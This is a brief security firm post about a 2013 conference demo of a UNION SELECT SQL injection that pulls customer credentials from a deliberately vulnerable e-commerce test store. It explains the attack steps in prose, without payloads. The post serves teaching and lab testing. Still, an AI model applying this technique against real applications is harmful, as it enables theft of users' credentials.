SQL Injection with UNION SELECT

Cyberis exhibited at the CEE Cyber and Information Security Showcase, Vienna, Austria on 13th February and 14th February 2013.

At the event we featured a 10-minute web application hacking demonstration, illustrating the retrieval of sensitive data from a vulnerable e-commerce application.

The technique used was a ‘UNION SELECT’ attack, whereby the attacker first identifies the injection point, then forms a syntactically correct UNION statement to retrieve arbitrary information from the database - in this case valid user credentials for the application from the 'customers' table.

A 'UNION SELECT' attack is the favoured exploitation method in this particular case, as error messages are limited (no opportunity to retrieve information from the messages themselves), and a time-based injection is restrictively slow. This method facilitates multiple row/column retrieval in one query, with use of the ‘group_concat’ function.

Some of the highest profile attacks of 2012 were attributed to SQL Injection attacks. The demonstration clearly shows how poor input validation can lead to wholesale abuse of an application.

Cyberis will be releasing a set of ‘patches’ for OSCommerce over the coming weeks, allowing you to reconstruct the vulnerable HackMe Store application in your own test lab. Other common OWASP vulnerabilities will also be included, such as cross-site scripting, inadequate access controls and several session management issues.